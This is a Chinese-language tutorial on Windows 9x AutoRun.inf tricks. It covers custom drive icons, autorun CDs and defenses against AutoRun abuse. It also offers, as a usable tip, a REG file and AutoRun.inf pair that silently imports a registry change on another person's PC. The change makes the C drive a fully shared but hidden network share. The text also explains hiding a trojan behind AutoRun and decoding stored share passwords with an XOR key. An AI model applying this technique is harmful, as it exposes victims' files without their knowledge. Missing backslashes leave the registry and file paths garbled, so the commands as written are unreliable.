小提示：是否執(zhí)行AutoRun功能其實(shí)由注冊(cè)表來(lái)決定。在“開(kāi)始”菜單的“運(yùn)行”中輸入Regedit，打開(kāi)注冊(cè)表編輯器，展開(kāi)到HKEY_CURRENT_USER SoftwareMicrosoftWindowsCurrentVersionPoliciesExploer主鍵下，右邊窗口中的二進(jìn)制值“NoDriveTypeAutoRun”決定了是否執(zhí)行AutoRun功能（包括硬盤(pán)和Ramdisk）。“NoDriveTypeAutoRun”默認(rèn)鍵值為95 00 00 00。


 共享另一臺(tái)電腦的硬盤(pán) 

如果你希望共享另外一臺(tái)電腦的所有驅(qū)動(dòng)器，可以利用我們剛剛提到的AutoRun.inf文件，前提是另外一臺(tái)電腦已經(jīng)打開(kāi)139共享。首先編寫(xiě)一個(gè)REG文件，打開(kāi)記事本，鍵入以下內(nèi)容：

REGEDIT4

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion

NetworkLanmanC$]

"Path"="C:\"

"Remark"=""

"Type"=dword:00000000

"Flags"=dword:00000302

 "Parmlenc"=hex:

 "Parm2enc"=hex: 

將以上部分另存為ShareC.reg文件備用。要特別注意第一行REGEDIT4要用大寫(xiě)且頂格寫(xiě)，在它后面要空上一行，在最后一行寫(xiě)完后記得要按兩次回車(chē)鍵，即最后也要空上一行。 

然后編制一個(gè)AutoRun.inf文件，鍵入以下內(nèi)容： 

[AutoRun]

Open=Regedit/s ShareC.reg 

加/s參數(shù)是為了導(dǎo)入時(shí)不會(huì)顯示任何提示信息，保存AutoRun.inf文件。將ShareC.reg和AutoRun.inf這兩個(gè)文件都復(fù)制到另一臺(tái)電腦的D盤(pán)的根目錄下，這樣對(duì)方只要雙擊D盤(pán)就會(huì)將ShareC.reg導(dǎo)入注冊(cè)表，在另一臺(tái)電腦重啟后C盤(pán)就會(huì)完全共享，要共享其他任何一個(gè)硬盤(pán)，方法都相同。

當(dāng)心主動(dòng)中木馬

一些別有用心的人，會(huì)在AutoRun.inf文件中，把“Open=ShareC.Reg”改成“Open=木馬服務(wù)端文件名”，然后把AutoRun.inf和配置好的木馬服務(wù)端一起復(fù)制到你的D盤(pán)的根目錄下，這樣不需你運(yùn)行木馬服務(wù)端程序，而只要你雙擊了D盤(pán)就會(huì)使木馬運(yùn)行。這樣做的好處顯而易見(jiàn)，那就是大大的增加了木馬運(yùn)行的主動(dòng)性，即使你非常警惕，不熟悉的文件輕易不會(huì)運(yùn)行，也很難防范這種方法。那么要如何防范他人利用AutoRun.inf文件對(duì)你進(jìn)行攻擊呢？

共享分類(lèi)完全是由flags標(biāo)志決定的，它的鍵值決定了共享目錄的類(lèi)型。當(dāng)flags=0x302時(shí)，重新啟動(dòng)系統(tǒng)，目錄共享標(biāo)志消失，表面上看沒(méi)有共享，實(shí)際上該目錄正處于完全共享狀態(tài)。網(wǎng)上流行的共享蠕蟲(chóng)，就是利用了此特性。如果把"Flags"=dword:00000302改成"Flags"=dword:00000402，就可以看到硬盤(pán)被共享了。 

 以上代碼中的Parmlenc、Parm2enc屬性項(xiàng)是加密的密碼，系統(tǒng)在加密時(shí)采用了8位密碼分別與“35 9a 4b a6 53 a9 d4 6a”進(jìn)行異或運(yùn)算，要想求出密碼再進(jìn)行一次異或運(yùn)算，然后查ASCII表可得出目錄密碼。

解決辦法是把HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionNetworkLanMan下面的“C$”、“D$”、“E$”等刪掉；然后刪除windowssystem下面的Vserver.vxd，它是Microsoft網(wǎng)絡(luò)上的文件與打印機(jī)共享虛擬設(shè)備驅(qū)動(dòng)程序；再把HKEY_LOCAL_MACHINESystemCurrentCo-ntrolSetServicesVxD下的Vserver鍵值刪掉，就會(huì)很安全了。 

事實(shí)上，大多數(shù)的硬盤(pán)根目錄下并不需要AutoRun.inf文件來(lái)運(yùn)行程序，因此我們完全可以將硬盤(pán)的AutoRun功能關(guān)閉，這樣即使在硬盤(pán)根目錄下有AutoRun.inf這個(gè)文件，Windows也不會(huì)去運(yùn)行其中指定的程序，從而可以達(dá)到防止黑客利用AutoRun.inf文件入侵的目的。 

除此以外，我們還應(yīng)讓W(xué)indows能顯示出隱藏的共享。大家都知道，在Windows 9X中設(shè)置共享時(shí)，通過(guò)在共享名后加上“$”這個(gè)符號(hào)，可使共享隱藏。比如，我們給一個(gè)名為share的計(jì)算機(jī)的C盤(pán)設(shè)置共享時(shí)，只要將其共享名設(shè)為C$，就看不到被共享的C盤(pán)，只有通過(guò)輸入該共享的確切路徑，才能訪(fǎng)問(wèn)此共享。不過(guò)我們只要將電腦中的msnp32.dll文件稍做修改，就可以讓W(xué)indows顯示出隱藏的共享。

由于在Windows下msnp32.dll會(huì)被調(diào)用，不能直接修改此文件，所以第一步我們要復(fù)制msnp32.dll到C盤(pán)下并改名為msnp32，msnp32.dll在C:Windowssystem文件夾下。運(yùn)行UltraEdit等十六進(jìn)制文件編輯器打開(kāi)msnp32，找到“24 56 E8 17”（位于偏移地址00003190～000031A0處），找到后將“24”改為“00”，然后保存，關(guān)閉UltraEdit。重啟計(jì)算機(jī)進(jìn)入DOS模式，在命令提示符下輸入copy c:msnp32.dll c:Windowssystemmsnp32.dll，重啟進(jìn)入Windows，現(xiàn)在雙擊share就能看見(jiàn)被隱藏的共享了。 

最后要提醒大家利用TCP/IP協(xié)議設(shè)計(jì)的NethackerⅡ等黑客軟件可以穿過(guò)Internet網(wǎng)絡(luò)，找到共享的主機(jī)，然后進(jìn)行相應(yīng)操作。所以當(dāng)您通過(guò)Modem上網(wǎng)時(shí)，千萬(wàn)要小心，因?yàn)橐徊恍⌒模闹鳈C(jī)將完全共享給對(duì)方。防范這類(lèi)事情發(fā)生的方法無(wú)非是經(jīng)常檢查系統(tǒng)，給系統(tǒng)打上補(bǔ)丁，經(jīng)常使用反黑殺毒軟件，上網(wǎng)時(shí)打開(kāi)防火墻，注意異常現(xiàn)象，留意AutoRun.inf文件的內(nèi)容，關(guān)閉共享或不要設(shè)置為完全共享，且加上復(fù)雜的共享密碼。
 

改變驅(qū)動(dòng)器圖標(biāo)

靈活應(yīng)用AutoRun，有時(shí)可以給電腦帶來(lái)不少樂(lè)趣。比如，可以使用AutoRun來(lái)為某個(gè)驅(qū)動(dòng)器指定漂亮的圖標(biāo)。具體步驟如下：

步驟1:打開(kāi)記事本，新建一個(gè)文件，在里面輸入如下內(nèi)容：

[AutoRun]

ICON=C:WindowsSystemShell32.DLL,21

說(shuō)明：Shell32.DLL是一個(gè)Windows系統(tǒng)文件，里面包含有很多Windows的系統(tǒng)圖標(biāo)，21表示顯示為編號(hào)為21的圖標(biāo)，當(dāng)然你也可以自己制作一個(gè)圖標(biāo)，只需要在“ICON”一行把路徑做相應(yīng)修改即可。除了可以使用DLL文件中的圖標(biāo)外，還能用EXE文件中的圖標(biāo)，或直接使用ICO文件。

步驟2:將該文件存儲(chǔ)到需要更改圖標(biāo)的磁盤(pán)的根目錄下面，命名為AutoRun.inf。

步驟3:閉記事本，在“我的電腦”里面按F5鍵刷新一下，就會(huì)看到驅(qū)動(dòng)器被改變了圖標(biāo)，

制作自運(yùn)行個(gè)性CD

如果你經(jīng)常刻錄光盤(pán)，那么利用AutoRun可以輕松地制作一張自啟動(dòng)光盤(pán)，指定光盤(pán)自動(dòng)運(yùn)行光盤(pán)上的某個(gè)程序，只需要在某個(gè)文件夾下新建一個(gè)autorun.inf文件，里面的內(nèi)容為：

[AutoRun]

OPEN=MyRun.BAT

ICON=Mylcon.ICO

其中MyRun.BAT、Mylcon.ICO分別是指定的需要自動(dòng)運(yùn)行的程序和圖標(biāo)文件。最后把Autorun.inf、MyRun.BAT和Mylcon.ICO三個(gè)文件拖放到CD-R的根目錄中一并刻錄，刻出來(lái)的光盤(pán)被插入光驅(qū)后可以自動(dòng)啟動(dòng)根目錄下MyRun.BAT文件。而且在Windows“資源管理器”中顯示的是Mylcon.ICO圖標(biāo)的樣子。

小提示：如果你將AutoRun.inf中的內(nèi)容改為：

[AutoRun]

open=explorer.exe/n/e

那么這張光盤(pán)運(yùn)行后會(huì)自動(dòng)打開(kāi)一個(gè)以“我的電腦”為主目錄的“資源管理器”窗口。

如果改為：

[AutoRun]

open=start.exeyourfilenme.html

那么該光盤(pán)運(yùn)行后自動(dòng)運(yùn)行光盤(pán)中的yourname.html網(wǎng)頁(yè)文件。